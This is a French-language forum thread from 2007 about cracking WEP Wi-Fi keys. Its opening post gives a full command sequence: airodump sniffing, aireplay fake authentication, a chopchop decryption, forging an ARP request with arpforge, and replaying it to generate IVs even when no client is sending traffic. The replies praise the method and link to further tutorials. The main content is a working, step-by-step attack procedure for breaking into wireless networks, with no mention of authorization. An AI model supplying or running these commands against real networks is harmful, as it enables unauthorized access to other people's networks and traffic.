Technique pour créer ses requetes arp, aireplay, arpforge, aircrack (Page 1) / Crack de clef wep / Forum d'entraide: tuto-fr.com

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 22-07-2007 04:51:50

kam
Membre
Inscription : 14-07-2007
Messages : 57

Technique pour créer ses requetes arp, aireplay, arpforge, aircrack

Salut à tous,
J'ai pris se qui suit sur le site canard wifi, auteur M1ck3y, j'ai pas encore tester, est-ce que quelqu'un connais cette methode? et qu'en pensez vous?

Technique pour créer ses requetes arp, aireplay, arpforge, aircrack

Dans la sécurité wifi, vous avez surement remarqué que sans client associé il est impossible de cracker quoi que ce soit. Mais ce n'est pas tout a fait vrai dans le cas du WEP. Admettons. Vous sniffez avec aireplay, un client se pointe. Vous souhaitez tester ce réseau, mais le client est apparu 10 secondes, et vous n'avez capturé aucune requete arp. Qu'à cela ne tienne, si vous avez l'adresse mac du client, fabriquez votre requete arp vous meme!

Cette méthode fonctionne si un client est présent mais ne lache aucune requete arp. En l'absence de client cette methode fonctionne aussi si on se fait passer pour un client sur un autre shell, on decrypte alors les paquets qu'on a soi meme envoyé mais ça marche!

-Premièrement ouvrez un airodump pour voir ce qui se passe
airodump ath0 out 0 (ou bien le canal qui vous intéresse)

-Fake authentification, si aucun client n'est là, vous aparaitrez alors comme client dans votre aireplay!
aireplay ath0 -1 30 -e "essid" -a "mac ap" -h "mac station"

-D'abord il faut decrypter un paquet
aireplay -4 ath0 -a "mac ap" -h "mac station"

-Ensuite trouver l'ip (qui est probablement 192.168.1.1 ou 192.168.1.2) (cette étape n'est pas vraiment nécessaire, l'ip 192.168.1.1 est utilisée dans la majorité des cas)
tcpdump -s 0 -n -e -r nomdupaquetdécrypté.cap

-Maintenant il faut forger une requete arp
arpforge nomdupaquetdécrypté.xor 1 "mac ap" \ "mac station" 192.168.1.100 192.168.1.1 arp.cap
arp.cap est le nom du fichier que vous fabriquez, vous pouvez l'appeler autrement bien sur

-Maintenant on peut envoyer cette requette pour faire grimper les ivs!
aireplay -3 -e "essid" -a "mac ap" -b "mac ap" -h "mac station" -x600 -r arp.cap ath0

Si tout a fonctionné, quand vous lancez votre attaque par injection de paquets avec la requete que vous venez de fabriquer, les IVs grimpent!!!

Voila comment faire grimper les ivs, meme sans arp et sans client c'est possible, il suffit d'avoir l'adresse mac d'une station associée à l'ap.

PS cette méthode a été testée avec Whax et elle fonctionne.

En esperant que cette technique sera utile...

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 22-07-2007 10:07:39

killbill
Membre
Inscription : 28-06-2007
Messages : 323

Re : Technique pour créer ses requetes arp, aireplay, arpforge, aircrack

ben c un membre actif du forum qui touche sa bille..
perso je l aime bien tres sympas toujours pret a aider les debutants (ça force le respect)
mais tu aurais due te servir de la fonction recherche et tu serais tomber sur ça
http://forum.tuto-fr.com/viewtopic.php?id=1699

Dernière modification par killbill (22-07-2007 11:13:06)


carte D-LINK Atheros PCI
alpha H et portable en dualboot.XPpro backtrack3final

Hors Ligne

#3 22-07-2007 11:00:40

M1ck3y
Admin
Inscription : 08-04-2007
Messages : 434
Site Web

Re : Technique pour créer ses requetes arp, aireplay, arpforge, aircrack

Salut à toi Kam, et félicitation pour avoir deterré ce vieux post d'un autre forum, ça montre que tu cherches et que tu t'intéresses. Sur canardwifi, ça  du leur paraitre clair comme du chinois à l'époque... En fait ce post date de mes premiers pas dans le crack de clé wep, quand j'avais réussi après moultes prises de tete ma première attaque chopchop. Je voulais donc partager cette technique d'attaque que j'avais trouvé très efficace. Et sur tuto-fr, je suis tombé sur des personnes intéressées, calées en crack de wep. C'est le meilleur forum (en français) que tu trouveras sur ce sujet. Alors pour te répondre, cette technique fonctionne très bien. Elle peut s'avérer un peu laborieuse parfois, mais elle offre de bons résultats. La syntaxe plus haut est celle d'aircrack sous whax. Tu peux utiliser l'attaque chopchop sous BT2 (aircrack-ng) mais les commandes sont différentes, tu les trouveras facilement en cherchant un peu dans le forum. Lis le post dont Killbill t'a donné le lien et tu comprendras mieux les subtilités et l'intéret de l'attaque chopchop.
Ma première chopchop... big_smile


logo602.jpg logo-wifi-highpower-175x60.jpg logo-awus036h-petit.png

Hors Ligne

#4 22-07-2007 22:59:30

kam
Membre
Inscription : 14-07-2007
Messages : 57

Re : Technique pour créer ses requetes arp, aireplay, arpforge, aircrack

Merci à vous pour vos conseillent, ça a pas l'air d'etre de la tarte mais je vais essayer, j'espère que ça m'aidera pour mon problème d'ivs.
Tchao et à bientot.

Hors Ligne

#5 25-07-2007 11:26:31

Nico419
Membre
Inscription : 23-07-2007
Messages : 10

Re : Technique pour créer ses requetes arp, aireplay, arpforge, aircrack

Bonjour ce que je ne compren pa c'est comment faire un arpforge dans bt2. Moi perso je ny arrive pas .

Dernière modification par Nico419 (25-07-2007 11:27:27)

Hors Ligne

#6 25-07-2007 13:26:29

M1ck3y
Admin
Inscription : 08-04-2007
Messages : 434
Site Web

Re : Technique pour créer ses requetes arp, aireplay, arpforge, aircrack

Cherches un minimum...
http://91.121.21.203/~woa/tuto-fr/chopc … pchop.html

Dernière modification par M1ck3y (25-07-2007 13:27:40)


logo602.jpg logo-wifi-highpower-175x60.jpg logo-awus036h-petit.png

Hors Ligne

#7 25-07-2007 14:17:06

wxcvbn
Membre d'honneur
Inscription : 28-02-2006
Messages : 1 139

Re : Technique pour créer ses requetes arp, aireplay, arpforge, aircrack

nico419> d'après ton autre topic tu n'a toujours pas reussi avec la méthode la plus simple pour obtenir des ivs alors oublie ces méthodes pour le moment, tu t'y interessera plus tard.

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
1 828 19-07-2017 11:02:40 par Jolab
3 1541 25-11-2014 18:50:10 par M1ck3y
1 1433 25-03-2012 16:00:34 par Nicolastuto
0 2672 03-02-2012 18:24:52 par Cherouss
0 1361 16-12-2011 18:56:00 par StarKiller26